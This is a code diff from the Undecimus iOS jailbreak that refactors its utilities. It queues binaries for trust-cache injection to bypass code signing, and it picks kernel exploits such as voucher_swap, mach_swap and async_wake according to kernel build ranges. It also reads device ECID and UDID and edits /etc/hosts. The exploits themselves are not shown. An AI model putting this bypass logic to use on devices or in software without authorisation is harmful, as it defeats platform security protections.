+- (BOOL) _LSPrivateRebuildApplicationDatabasesForSystemApps:(BOOL)system internal:(BOOL)internal user:(BOOL)user;
+@end
+
 static inline bool create_file_data(const char *file, int owner, mode_t mode, NSData *data) {
     return [[NSFileManager defaultManager] createFileAtPath:@(file) contents:data attributes:@{
                NSFileOwnerAccountID: @(owner),
@@ -101,10 +114,14 @@ int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unre
 int runCommand(const char *cmd, ...);
 NSString *pathForResource(NSString *resource);
 pid_t pidOfProcess(const char *name);
+char *getKernelVersion(void);
+char *getMachineName(void);
+char *getModelName(void);
 bool kernelVersionContains(const char *string);
 bool machineNameContains(const char *string);
 bool multi_path_tcp_enabled(void);
 bool jailbreakEnabled(void);
+NSString *getKernelBuildVersion(void);
 bool supportsExploit(exploit_t exploit);
 bool jailbreakSupported(void);
 bool respringSupported(void);
@@ -128,6 +145,23 @@ bool uninstallRootLessJB(void);
 bool verifyECID(NSString *ecid);
 bool canOpen(const char *URL);
 bool airplaneModeEnabled(void);
+bool installApp(const char *bundle);
+bool rebuildApplicationDatabases(void);
+char *get_path_for_pid(pid_t pid);
+NSString *getECID(void);
+NSString *getUDID(void);
+char *sysctlWithName(const char *name);
+char *getOSVersion(void);
+char *getOSProductVersion(void);
+void printOSDetails(void);
+bool isBetaFirmware(void);
+double getUptime(void);
+vm_size_t get_kernel_page_size(void);
+int waitForFile(const char *filename);
+NSString *hexFromInt(NSInteger val);
+void waitFor(int seconds);
+void blockDomainWithName(const char *name);
+void unblockDomainWithName(const char *name);
 
 extern NSData *lastSystemOutput;
 

Undecimus/source/utils.m

@@ -10,7 +10,6 @@
 #import <sys/sysctl.h>
 #import <Foundation/Foundation.h>
 #import <CommonCrypto/CommonDigest.h>
-#import <magic.h>
 #import <spawn.h>
 #include <copyfile.h>
 #include <common.h>
@@ -29,30 +28,29 @@
 extern char **environ;
 int logfd=-1;
 
+bool injectedToTrustCache = false;
+NSMutableArray *toInjectToTrustCache = nil;
+
 NSData *lastSystemOutput=nil;
 void injectDir(NSString *dir) {
     NSFileManager *fm = [NSFileManager defaultManager];
     NSMutableArray *toInject = [NSMutableArray new];
-    magic_t cookie = magic_open(MAGIC_MIME_TYPE);
-    NSString *magicFile = pathForResource(@"macho.mgc");
-    if (cookie && magic_load(cookie, magicFile.UTF8String)==0) {
-        const char *magic=NULL;
-        for (NSString *filename in [fm contentsOfDirectoryAtPath:dir error:nil]) {
-            NSString *file = [dir stringByAppendingPathComponent:filename];
-            if ((magic = magic_file(cookie, file.UTF8String)))
-            {
-                if (strcmp(magic, "application/x-mach-binary")==0) {
-                    [toInject addObject:file];
-                }
+    for (NSString *filename in [fm contentsOfDirectoryAtPath:dir error:nil]) {
+        NSString *file = [dir stringByAppendingPathComponent:filename];
+        if (cdhashFor(file) != nil) {
+            [toInject addObject:file];
+        }
+    }
+    LOG("Will inject %lu files for %@", (unsigned long)toInject.count, dir);
+    if (toInject.count > 0) {
+        if (injectedToTrustCache) {
+            LOG("Warning: Trust cache already injected");
+        }
+        for (NSString *path in toInject) {
+            if (![toInjectToTrustCache containsObject:path]) {
+                [toInjectToTrustCache addObject:path];
             }
         }
-    } else {
-        LOG("Error opening or loading magic");
-    }
-    magic_close(cookie);
-    LOG("Injecting %lu files for %@", (unsigned long)toInject.count, dir);
-    if (toInject.count > 0) {
-        injectTrustCache(toInject, GETOFFSET(trustcache));
     }
 }
 
@@ -262,36 +260,26 @@ bool extractDeb(NSString *debPath) {
         [deb extractFileNum:3 toFd:pipe.fileHandleForWriting.fileDescriptor];
     });
     bool result = [tar extractToPath:@"/"];
-    if ((kCFCoreFoundationVersionNumber >= 1535.12) && result) {
+    if ((kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) && result) {
         chdir("/");
         NSMutableArray *toInject = [NSMutableArray new];
         NSDictionary *files = tar.files;
-        magic_t cookie = magic_open(MAGIC_MIME_TYPE);
-        LOG("Opened magic");
-        NSString *magicFile = pathForResource(@"macho.mgc");
-        LOG("MagicFile: %@", magicFile);
-        if (cookie && magic_load(cookie, magicFile.UTF8String)==0) {
-            LOG("Opened magic");
-            const char *magic=NULL;
-            for (NSString *file in files.allKeys) {
-                mode_t mode = [files[file][@"mode"] integerValue];
-                if (!S_ISDIR(mode)) {
-                    if ((magic = magic_file(cookie, file.UTF8String)))
-                    {
-                        LOG("%@: %s", file, magic);
-                        if (strcmp(magic, "application/x-mach-binary")==0) {
-                            [toInject addObject:file];
-                        }
-                    }
+        for (NSString *file in files.allKeys) {
+            NSString *path = [@"/" stringByAppendingString:[file stringByStandardizingPath]];
+            if (cdhashFor(path) != nil) {
+                [toInject addObject:path];
+            }
+        }
+        LOG("Will inject %lu files for %@", (unsigned long)toInject.count, debPath);
+        if (toInject.count > 0) {
+            if (injectedToTrustCache) {
+                LOG("Warning: Trust cache already injected");
+            }
+            for (NSString *path in toInject) {
+                if (![toInjectToTrustCache containsObject:path]) {
+                    [toInjectToTrustCache addObject:path];
                 }
             }
-        } else {
-            LOG("Error opening or loading magic");
-        }
-        magic_close(cookie);
-        LOG("Injecting %lu files for %@", (unsigned long)toInject.count, debPath);
-        if (toInject.count > 0) {
-            injectTrustCache(toInject, GETOFFSET(trustcache));
         }
     }
     return result;
@@ -420,7 +408,7 @@ bool is_mountpoint(const char *filename) {
     assert(rv == ERR_SUCCESS);
     if (cwd) {
         chdir(cwd);
-        free(cwd);
+        SafeFreeNULL(cwd);
     }
     return buf.st_dev != p_buf.st_dev || buf.st_ino == p_buf.st_ino;
 }
@@ -639,36 +627,49 @@ pid_t pidOfProcess(const char *name) {
     pid_t pids[numberOfProcesses];
     bzero(pids, sizeof(pids));
     proc_listpids(PROC_ALL_PIDS, 0, pids, (int)sizeof(pids));
-    for (int i = 0; i < numberOfProcesses; ++i) {
+    bool foundProcess = false;
+    pid_t processPid = 0;
+    for (int i = 0; i < numberOfProcesses && !foundProcess; ++i) {
         if (pids[i] == 0) {
             continue;
         }
-        char pathBuffer[PROC_PIDPATHINFO_MAXSIZE];
-        bzero(pathBuffer, PROC_PIDPATHINFO_MAXSIZE);
-        proc_pidpath(pids[i], pathBuffer, sizeof(pathBuffer));
-        if (strlen(pathBuffer) > 0 && strcmp(pathBuffer, name) == 0) {
-            return pids[i];
+        char *path = get_path_for_pid(pids[i]);
+        if (path != NULL) {
+            if (strlen(path) > 0 && strcmp(path, name) == 0) {
+                processPid = pids[i];
+                foundProcess = true;
+            }
+            SafeFreeNULL(path);
         }
     }
-    return 0;
+    return processPid;
+}
+
+char *getKernelVersion() {
+    return sysctlWithName("kern.version");
+}
+
+char *getMachineName() {
+    return sysctlWithName("hw.machine");
+}
+char *getModelName() {
+    return sysctlWithName("hw.model");
 }
 
 bool kernelVersionContains(const char *string) {
-    static struct utsname u = { 0 };
-    static dispatch_once_t onceToken;
-    dispatch_once(&onceToken, ^{
-        uname(&u);
-    });
-    return (strstr(u.version, string) != NULL);
+    char *kernelVersion = getKernelVersion();
+    if (kernelVersion == NULL) return false;
+    bool ret = strstr(kernelVersion, string) != NULL;
+    SafeFreeNULL(kernelVersion);
+    return ret;
 }
 
 bool machineNameContains(const char *string) {
-    static struct utsname u = { 0 };
-    static dispatch_once_t onceToken;
-    dispatch_once(&onceToken, ^{
-        uname(&u);
-    });
-    return (strstr(u.machine, string) != NULL);
+    char *machineName = getMachineName();
+    if (machineName == NULL) return false;
+    bool ret = strstr(machineName, string) != NULL;
+    SafeFreeNULL(machineName);
+    return ret;
 }
 
 #define AF_MULTIPATH 39
@@ -697,8 +698,8 @@ bool multi_path_tcp_enabled() {
         eps.sae_dstaddrlen = sizeof(struct sockaddr);
         connectx(sock, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);
         enabled = (errno != EPERM);
-        free(sockaddr_src);
-        free(sockaddr_dst);
+        SafeFreeNULL(sockaddr_src);
+        SafeFreeNULL(sockaddr_dst);
         close(sock);
     });
     return enabled;
@@ -709,330 +710,107 @@ bool jailbreakEnabled() {
     access(SLIDE_FILE, F_OK) == ERR_SUCCESS;
 }
 
+NSString *getKernelBuildVersion() {
+    NSString *kernelBuild = nil;
+    NSString *cleanString = nil;
+    char *kernelVersion = NULL;
+    kernelVersion = getKernelVersion();
+    if (kernelVersion == NULL) return nil;
+    cleanString = [NSString stringWithUTF8String:kernelVersion];
+    SafeFreeNULL(kernelVersion);
+    cleanString = [[cleanString componentsSeparatedByString:@"; "] objectAtIndex:1];
+    cleanString = [[cleanString componentsSeparatedByString:@"-"] objectAtIndex:1];
+    cleanString = [[cleanString componentsSeparatedByString:@"/"] objectAtIndex:0];
+    kernelBuild = [cleanString copy];
+    return kernelBuild;
+}
+
 bool supportsExploit(exploit_t exploit) {
 #ifdef CAN_HAS_UNSUPPORTED_EXPLOIT
     return true;
 #else /* !CAN_HAS_UNSUPPORTED_EXPLOIT */
-    static NSArray *list;
-    static dispatch_once_t onceToken;
-
-    dispatch_once(&onceToken, ^{
-        list = @[
-                 // Empty List
-                 @[@"4397.0.0.2.4~1",
-                   @"4481.0.0.2.1~1",
-                   @"4532.0.0.0.1~30",
-                   @"4556.0.0.2.5~1",
-                   @"4570.1.24.2.3~1",
-                   @"4570.2.3~8",
-                   @"4570.2.5~84",
-                   @"4570.2.5~167",
-                   @"4570.7.2~3",
-                   @"4570.20.55~10",
-                   @"4570.20.62~9",
-                   @"4570.20.62~4",
-                   @"4570.30.79~22",
-                   @"4570.30.85~18",
-                   @"4570.32.1~2",
-                   @"4570.32.1~1",
-                   @"4570.40.6~8",
-                   @"4570.40.9~7",
-                   @"4570.40.9~1",
-                   @"4570.50.243~9",
-                   @"4570.50.257~6",
-                   @"4570.50.279~9",
-                   @"4570.50.294~5",
-                   @"4570.52.2~3",
-                   @"4570.52.2~8",
-                   @"4570.60.10.0.1~16",
-                   @"4570.60.16~9",
-                   @"4570.60.19~25"],
-                 
-                 // Multi Path
-                 @[@"4397.0.0.2.4~1",
-                   @"4481.0.0.2.1~1",
-                   @"4532.0.0.0.1~30",
-                   @"4556.0.0.2.5~1",
-                   @"4570.1.24.2.3~1",
-                   @"4570.2.3~8",
-                   @"4570.2.5~84",
-                   @"4570.2.5~167",
-                   @"4570.7.2~3",
-                   @"4570.20.55~10",
-                   @"4570.20.62~9",
-                   @"4570.20.62~4",
-                   @"4570.30.79~22",
-                   @"4570.30.85~18",
-                   @"4570.32.1~2",
-                   @"4570.32.1~1",
-                   @"4570.40.6~8",
-                   @"4570.40.9~7",
-                   @"4570.40.9~1",
-                   @"4570.50.243~9",
-                   @"4570.50.257~6",
-                   @"4570.50.279~9",
-                   @"4570.50.294~5",
-                   @"4570.52.2~3",
-                   @"4570.52.2~8",],
-                 
-                 // Async Wake
-                 @[@"4397.0.0.2.4~1",
-                   @"4481.0.0.2.1~1",
-                   @"4532.0.0.0.1~30",
-                   @"4556.0.0.2.5~1",
-                   @"4570.1.24.2.3~1",
-                   @"4570.2.3~8",
-                   @"4570.2.5~84",
-                   @"4570.2.5~167",
-                   @"4570.7.2~3",
-                   @"4570.20.55~10",
-                   @"4570.20.62~9",
-                   @"4570.20.62~4"],
-                 
-                 // Voucher Swap
-                 @[@"4397.0.0.2.4~1",
-                   @"4481.0.0.2.1~1",
-                   @"4532.0.0.0.1~30",
-                   @"4556.0.0.2.5~1",
-                   @"4570.1.24.2.3~1",
-                   @"4570.2.3~8",
-                   @"4570.2.5~84",
-                   @"4570.2.5~167",
-                   @"4570.7.2~3",
-                   @"4570.20.55~10",
-                   @"4570.20.62~9",
-                   @"4570.20.62~4",
-                   @"4570.30.79~22",
-                   @"4570.30.85~18",
-                   @"4570.32.1~2",
-                   @"4570.32.1~1",
-                   @"4570.40.6~8",
-                   @"4570.40.9~7",
-                   @"4570.40.9~1",
-                   @"4570.50.243~9",
-                   @"4570.50.257~6",
-                   @"4570.50.279~9",
-                   @"4570.50.294~5",
-                   @"4570.52.2~3",
-                   @"4570.52.2~8",
-                   @"4570.60.10.0.1~16",
-                   @"4570.60.16~9",
-                   @"4570.60.19~25",
-                   @"4570.60.21~7",
-                   @"4570.60.21~3",
-                   @"4570.70.14~16",
-                   @"4570.70.19~13",
-                   @"4570.70.24~9",
-                   @"4570.70.24~3",
-                   @"4903.200.199.12.3~1",
-                   @"4903.200.249.22.3~1",
-                   @"4903.200.274.32.3~1",
-                   @"4903.200.304.42.1~1",
-                   @"4903.200.327.52.1~1",
-                   @"4903.200.342.62.3~1",
-                   @"4903.200.354~11",
-                   @"4903.202.1~2",
-                   @"4903.202.2~2",
-                   @"4903.202.2~1",
-                   @"4903.220.42~21",
-                   @"4903.220.48~40",
-                   @"4903.222.1~7",
-                   @"4903.222.4~3",
-                   @"4903.222.5~3",
-                   @"4903.222.5~1",
-                   @"4903.230.15~8",
-                   @"4903.232.1~3",
-                   @"4903.232.2~2",
-                   @"4903.232.2~1",
-                   @"4903.240.8~8",
-                   @"4903.232.2~1"],
-                 
-                 // V1ntex
-                 @[@"4570.20.55~10",
-                   @"4570.20.62~9",
-                   @"4570.20.62~4",
-                   @"4570.30.79~22",
-                   @"4570.30.85~18",
-                   @"4570.32.1~2",
-                   @"4570.32.1~1",
-                   @"4570.40.6~8",
-                   @"4570.40.9~7",
-                   @"4570.40.9~1",
-                   @"4570.50.243~9",
-                   @"4570.50.257~6",
-                   @"4570.50.279~9",
-                   @"4570.50.294~5",
-                   @"4570.52.2~3",
-                   @"4570.52.2~8",
-                   @"4570.60.10.0.1~16",
-                   @"4570.60.16~9",
-                   @"4570.60.19~25",
-                   @"4570.60.21~7",
-                   @"4570.60.21~3",
-                   @"4570.70.14~16",
-                   @"4570.70.19~13",
-                   @"4570.70.24~9",
-                   @"4570.70.24~3"],
-                 
-                 // V3ntex
-                 @[@"4903.200.199.12.3~1",
-                   @"4903.200.249.22.3~1",
-                   @"4903.200.274.32.3~1",
-                   @"4903.200.304.42.1~1",
-                   @"4903.200.327.52.1~1",
-                   @"4903.200.342.62.3~1",
-                   @"4903.200.354~11",
-                   @"4903.202.1~2",
-                   @"4903.202.2~2",
-                   @"4903.202.2~1",
-                   @"4903.220.42~21",
-                   @"4903.220.48~40",
-                   @"4903.222.1~7",
-                   @"4903.222.4~3",
-                   @"4903.222.5~3",
-                   @"4903.222.5~1",
-                   @"4903.230.15~8",
-                   @"4903.232.1~3",
-                   @"4903.232.2~2",
-                   @"4903.232.2~1",
-                   @"4903.240.8~8",
-                   @"4903.232.2~1"],
-                 
-                 // Deja Xnu
-                 @[@"4397.0.0.2.4~1",
-                   @"4481.0.0.2.1~1",
-                   @"4532.0.0.0.1~30",
-                   @"4556.0.0.2.5~1",
-                   @"4570.1.24.2.3~1",
-                   @"4570.2.3~8",
-                   @"4570.2.5~84",
-                   @"4570.2.5~167",
-                   @"4570.7.2~3",
-                   @"4570.20.55~10",
-                   @"4570.20.62~9",
-                   @"4570.20.62~4",
-                   @"4570.30.79~22",
-                   @"4570.30.85~18",
-                   @"4570.32.1~2",
-                   @"4570.32.1~1",
-                   @"4570.40.6~8",
-                   @"4570.40.9~7",
-                   @"4570.40.9~1",
-                   @"4570.50.243~9",
-                   @"4570.50.257~6",
-                   @"4570.50.279~9",
-                   @"4570.50.294~5",
-                   @"4570.52.2~3",
-                   @"4570.52.2~8",
-                   @"4570.60.10.0.1~16",
-                   @"4570.60.16~9",
-                   @"4570.60.19~25",
-                   @"4570.60.21~7",
-                   @"4570.60.21~3",
-                   @"4570.70.14~16",
-                   @"4570.70.19~13",
-                   @"4570.70.24~9",
-                   @"4570.70.24~3"],
-                 
-                 // Necp
-                 @[@"4397.0.0.2.4~1",
-                   @"4481.0.0.2.1~1",
-                   @"4532.0.0.0.1~30",
-                   @"4556.0.0.2.5~1",
-                   @"4570.1.24.2.3~1",
-                   @"4570.2.3~8",
-                   @"4570.2.5~84",
-                   @"4570.2.5~167",
-                   @"4570.7.2~3",
-                   @"4570.20.55~10",
-                   @"4570.20.62~9",
-                   @"4570.20.62~4",
-                   @"4570.30.79~22",
-                   @"4570.30.85~18",
-                   @"4570.32.1~2",
-                   @"4570.32.1~1",
-                   @"4570.40.6~8",
-                   @"4570.40.9~7",
-                   @"4570.40.9~1",
-                   @"4570.50.243~9",
-                   @"4570.50.257~6",
-                   @"4570.50.279~9",
-                   @"4570.50.294~5",
-                   @"4570.52.2~3",
-                   @"4570.52.2~8",
-                   @"4570.60.10.0.1~16",
-                   @"4570.60.16~9",
-                   @"4570.60.19~25",
-                   @"4570.60.21~7",
-                   @"4570.60.21~3",
-                   @"4570.70.14~16",
-                   @"4570.70.19~13",
-                   @"4570.70.24~9",
-                   @"4570.70.24~3"],
-                 ];
-    });
+    
+    NSString *minKernelBuildVersion = nil;
+    NSString *maxKernelBuildVersion = nil;
     
     switch (exploit) {
         case multi_path_exploit: {
             if (!multi_path_tcp_enabled()) {
                 return false;
             }
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4570.52.2~8";
             break;
         }
         case voucher_swap_exploit: {
-            vm_size_t vm_size = 0;
-            if (_host_page_size(mach_host_self(), &vm_size) != ERR_SUCCESS) {
-                LOG("Unable to determine page size.");
+            if (get_kernel_page_size() != 0x4000) {
                 return false;
             }
-            if (vm_size != 0x4000) {
-                return false;
-            }
-            if (machineNameContains("iPad5,") && kCFCoreFoundationVersionNumber >= 1535.12) {
-                return false;
-            }
-            if (machineNameContains("iPhone11,") || machineNameContains("iPad8,")) {
+            if (machineNameContains("iPad5,") &&
+                kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) {
                 return false;
             }
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4903.240.8~8";
             break;
         }
-        case v1ntex_exploit: {
-            vm_size_t vm_size = 0;
-            if (_host_page_size(mach_host_self(), &vm_size) != ERR_SUCCESS) {
-                LOG("Unable to determine page size.");
-                return false;
-            }
-            if (vm_size != 0x1000) {
+        case mach_swap_exploit: {
+            if (get_kernel_page_size() != 0x1000 &&
+                !machineNameContains("iPad5,") &&
+                !machineNameContains("iPhone8,") &&
+                !machineNameContains("iPad6,")) {
                 return false;
             }
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4903.240.8~8";
             break;
         }
-        case v3ntex_exploit: {
-            if (!machineNameContains("iPad5,")) {
-                return false;
-            }
+        case mach_swap_2_exploit: {
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4903.240.8~8";
             break;
         }
         case deja_xnu_exploit: {
             if (jailbreakEnabled())
                 return false;
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4570.70.24~9";
             break;
         }
-        case empty_list_exploit:
+        case empty_list_exploit: {
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4570.60.19~25";
             break;
-        case async_wake_exploit:
+        }
+        case async_wake_exploit: {
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4570.20.62~4";
             break;
-        case necp_exploit:
+        }
+        case necp_exploit: {
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4570.70.24~9";
             break;
+        }
+        case kalloc_crash: {
+            minKernelBuildVersion = @"4397.0.0.2.4~1";
+            maxKernelBuildVersion = @"4903.252.2~2";
+            break;
+        }
         default:
             return false;
             break;
     }
     
-    for (NSString *string in list[exploit]) {
-        if (kernelVersionContains(string.UTF8String)) {
-            return true;
+    if (minKernelBuildVersion != nil && maxKernelBuildVersion != nil) {
+        NSString *kernelBuildVersion = getKernelBuildVersion();
+        if (kernelBuildVersion != nil) {
+            if ([kernelBuildVersion compare:minKernelBuildVersion options:NSNumericSearch] != NSOrderedAscending && [kernelBuildVersion compare:maxKernelBuildVersion options:NSNumericSearch] != NSOrderedDescending) {
+                return true;
+            }
         }
+    } else {
+        return true;
     }
 
     return false;
@@ -1044,8 +822,8 @@ bool jailbreakSupported() {
     supportsExploit(multi_path_exploit) ||
     supportsExploit(async_wake_exploit) ||
     supportsExploit(voucher_swap_exploit) ||
-    supportsExploit(v1ntex_exploit) ||
-    supportsExploit(v3ntex_exploit);
+    supportsExploit(mach_swap_exploit) ||
+    supportsExploit(mach_swap_2_exploit);
 }
 
 bool respringSupported() {
@@ -1054,22 +832,23 @@ bool respringSupported() {
 
 bool restartSupported() {
     return supportsExploit(necp_exploit) ||
-    supportsExploit(voucher_swap_exploit);
+    supportsExploit(voucher_swap_exploit) ||
+    supportsExploit(kalloc_crash);
 }
 
 NSInteger recommendedJailbreakSupport() {
-    if (supportsExploit(async_wake_exploit))
+    if (supportsExploit(mach_swap_exploit))
+        return mach_swap_exploit;
+    else if (supportsExploit(async_wake_exploit))
         return async_wake_exploit;
     else if (supportsExploit(voucher_swap_exploit))
         return voucher_swap_exploit;
+    else if (supportsExploit(mach_swap_2_exploit))
+        return mach_swap_2_exploit;
     else if (supportsExploit(multi_path_exploit))
         return multi_path_exploit;
-    else if (supportsExploit(v1ntex_exploit))
-        return v1ntex_exploit;
     else if (supportsExploit(empty_list_exploit))
         return empty_list_exploit;
-    else if (supportsExploit(v3ntex_exploit))
-        return v3ntex_exploit;
     else
         return -1;
 }
@@ -1079,6 +858,8 @@ NSInteger recommendedRestartSupport() {
         return necp_exploit;
     else if (supportsExploit(voucher_swap_exploit))
         return voucher_swap_exploit;
+    else if (supportsExploit(kalloc_crash))
+        return kalloc_crash;
     else
         return -1;
 }
@@ -1272,3 +1053,235 @@ bool airplaneModeEnabled() {
     }
 }
 
+bool installApp(const char *bundle) {
+    NSString *bundle_path = @(bundle);
+    NSURL *URL = [NSURL URLWithString:bundle_path];
+    NSString *info_plist_path = [bundle_path stringByAppendingPathComponent:@"Info.plist"];
+    NSMutableDictionary *info_plist = [NSMutableDictionary dictionaryWithContentsOfFile:info_plist_path];
+    NSString *bundle_identifier = info_plist[@"CFBundleIdentifier"];
+    NSMutableDictionary *options = [NSMutableDictionary new];
+    options[@"CFBundleIdentifier"] = bundle_identifier;
+    LSApplicationWorkspace *applicationWorkspace = [LSApplicationWorkspace defaultWorkspace];
+    if ([applicationWorkspace installApplication:URL withOptions:options]) {
+        return true;
+    } else {
+        LOG("Failed to install application");
+        return false;
+    }
+}
+
+bool rebuildApplicationDatabases() {
+    LSApplicationWorkspace *applicationWorkspace = [LSApplicationWorkspace defaultWorkspace];
+    if ([applicationWorkspace _LSPrivateRebuildApplicationDatabasesForSystemApps:YES internal:YES user:NO]) {
+        return true;
+    } else {
+        LOG("Failed to rebuild application databases");
+        return false;
+    }
+}
+
+char *get_path_for_pid(pid_t pid) {
+    char *ret = NULL;
+    uint32_t path_size = PROC_PIDPATHINFO_MAXSIZE;
+    char *path = malloc(path_size);
+    if (path != NULL) {
+        if (proc_pidpath(pid, path, path_size) >= 0) {
+            ret = strdup(path);
+        }
+        SafeFreeNULL(path);
+    }
+    return ret;
+}
+
+NSString *getECID() {
+    NSString *ECID = nil;
+    CFStringRef value = MGCopyAnswer(kMGUniqueChipID);
+    if (value != nil) {
+        ECID = [NSString stringWithFormat:@"%@", value];
+        CFRelease(value);
+    }
+    return ECID;
+}
+
+NSString *getUDID() {
+    NSString *UDID = nil;
+    CFStringRef value = MGCopyAnswer(kMGUniqueDeviceID);
+    if (value != nil) {
+        UDID = [NSString stringWithFormat:@"%@", value];
+        CFRelease(value);
+    }
+    return UDID;
+}
+
+char *sysctlWithName(const char *name) {
+    kern_return_t kr = KERN_FAILURE;
+    char *ret = NULL;
+    size_t *size = NULL;
+    size = (size_t *)malloc(sizeof(size_t));
+    if (size == NULL) goto out;
+    bzero(size, sizeof(size_t));
+    if (sysctlbyname(name, NULL, size, NULL, 0) != ERR_SUCCESS) goto out;
+    ret = (char *)malloc(*size);
+    if (ret == NULL) goto out;
+    bzero(ret, *size);
+    if (sysctlbyname(name, ret, size, NULL, 0) != ERR_SUCCESS) goto out;
+    kr = KERN_SUCCESS;
+out:
+    if (kr == KERN_FAILURE) SafeFreeNULL(ret);
+    SafeFreeNULL(size);
+    return ret;
+}
+
+char *getOSVersion() {
+    return sysctlWithName("kern.osversion");
+}
+
+char *getOSProductVersion() {
+    return sysctlWithName("kern.osproductversion");
+}
+
+void printOSDetails() {
+    char *machineName = NULL;
+    char *modelName = NULL;
+    char *kernelVersion = NULL;
+    char *OSProductVersion = NULL;
+    char *OSVersion = NULL;
+    machineName = getMachineName();
+    if (machineName == NULL) goto out;
+    modelName = getModelName();
+    if (modelName == NULL) goto out;
+    kernelVersion = getKernelVersion();
+    if (kernelVersion == NULL) goto out;
+    OSProductVersion = getOSProductVersion();
+    if (OSProductVersion == NULL) goto out;
+    OSVersion = getOSVersion();
+    if (OSVersion == NULL) goto out;
+    LOG("Machine Name: %s", machineName);
+    LOG("Model Name: %s", modelName);
+    LOG("Kernel Version: %s", kernelVersion);
+    LOG("Kernel Page Size: 0x%lx", get_kernel_page_size());
+    LOG("System Version: iOS %s (%s) (Build: %s)", OSProductVersion, isBetaFirmware() ? "Beta" : "Stable", OSVersion);
+out:
+    SafeFreeNULL(machineName);
+    SafeFreeNULL(modelName);
+    SafeFreeNULL(kernelVersion);
+    SafeFreeNULL(OSProductVersion);
+    SafeFreeNULL(OSVersion);
+}
+
+bool isBetaFirmware() {
+    bool ret = false;
+    char *OSVersion = getOSVersion();
+    if (OSVersion == NULL) return false;
+    if (strlen(OSVersion) > 6) ret = true;
+    SafeFreeNULL(OSVersion);
+    return ret;
+}
+
+double getUptime() {
+    double uptime = 0;
+    size_t *size = NULL;
+    struct timeval *boottime = NULL;
+    size = (size_t *)malloc(sizeof(size_t));
+    if (size == NULL) goto out;
+    bzero(size, sizeof(size_t));
+    *size = sizeof(struct timeval);
+    boottime = (struct timeval *)malloc(*size);
+    if (boottime == NULL) goto out;
+    bzero(boottime, *size);
+    int mib[2] = { CTL_KERN, KERN_BOOTTIME };
+    if (sysctl(mib, 2, boottime, size, NULL, 0) != ERR_SUCCESS) goto out;
+    time_t bsec = boottime->tv_sec, csec = time(NULL);
+    uptime = difftime(csec, bsec);
+out:
+    SafeFreeNULL(size);
+    SafeFreeNULL(boottime);
+    return uptime;
+}
+
+vm_size_t get_kernel_page_size() {
+    vm_size_t kernel_page_size = 0;
+    vm_size_t *out_page_size = NULL;
+    host_t host = mach_host_self();
+    if (!MACH_PORT_VALID(host)) goto out;
+    out_page_size = (vm_size_t *)malloc(sizeof(vm_size_t));
+    if (out_page_size == NULL) goto out;
+    bzero(out_page_size, sizeof(vm_size_t));
+    if (_host_page_size(host, out_page_size) != KERN_SUCCESS) goto out;
+    kernel_page_size = *out_page_size;
+out:
+    if (MACH_PORT_VALID(host)) mach_port_deallocate(mach_task_self(), host); host = HOST_NULL;
+    SafeFreeNULL(out_page_size);
+    return kernel_page_size;
+}
+
+int waitForFile(const char *filename) {
+    auto rv = access(filename, F_OK);
+    for (auto i = 0; !(i >= 100 || rv == ERR_SUCCESS); i++) {
+        usleep(100000);
+        rv = access(filename, F_OK);
+    }
+    return rv;
+}
+
+NSString *hexFromInt(NSInteger val) {
+    return [NSString stringWithFormat:@"0x%lX", (long)val];
+}
+
+void waitFor(int seconds) {
+    for (auto i = 1; i <= seconds; i++) {
+        LOG("Waiting (%d/%d)", i, seconds);
+        sleep(1);
+    }
+}
+
+void blockDomainWithName(const char *name) {
+    id hostsFile = nil;
+    id newLine = nil;
+    id newHostsFile = nil;
+    hostsFile = [NSString stringWithContentsOfFile:@"/etc/hosts" encoding:NSUTF8StringEncoding error:nil];
+    newHostsFile = hostsFile;
+    newLine = [NSString stringWithFormat:@"\n127.0.0.1 %s\n", name];
+    if (![hostsFile containsString:newLine]) {
+        newHostsFile = [newHostsFile stringByAppendingString:newLine];
+    }
+    newLine = [NSString stringWithFormat:@"\n::1 %s\n", name];
+    if (![hostsFile containsString:newLine]) {
+        newHostsFile = [newHostsFile stringByAppendingString:newLine];
+    }
+    if (![newHostsFile isEqual:hostsFile]) {
+        [newHostsFile writeToFile:@"/etc/hosts" atomically:YES encoding:NSUTF8StringEncoding error:nil];
+    }
+}
+
+void unblockDomainWithName(const char *name) {
+    id hostsFile = nil;
+    id newLine = nil;
+    id newHostsFile = nil;
+    hostsFile = [NSString stringWithContentsOfFile:@"/etc/hosts" encoding:NSUTF8StringEncoding error:nil];
+    newHostsFile = hostsFile;
+    newLine = [NSString stringWithFormat:@"\n127.0.0.1 %s\n", name];
+    if ([hostsFile containsString:newLine]) {
+        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+    }
+    newLine = [NSString stringWithFormat:@"\n0.0.0.0 %s\n", name];
+    if ([hostsFile containsString:newLine]) {
+        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+    }
+    newLine = [NSString stringWithFormat:@"\n0.0.0.0    %s\n", name];
+    if ([hostsFile containsString:newLine]) {
+        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+    }
+    newLine = [NSString stringWithFormat:@"\n::1 %s\n", name];
+    if ([hostsFile containsString:newLine]) {
+        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+    }
+    if (![newHostsFile isEqual:hostsFile]) {
+        [newHostsFile writeToFile:@"/etc/hosts" atomically:YES encoding:NSUTF8StringEncoding error:nil];
+    }
+}
+
+__attribute__((constructor))
+static void ctor() {
+    toInjectToTrustCache = [NSMutableArray new];
+}

Undecimus/source/v1ntex_exploit.h

@@ -1,18 +0,0 @@
-//
-//  exploit.h
-//  v1ntex
-//
-//  Created by tihmstar on 23.01.19.
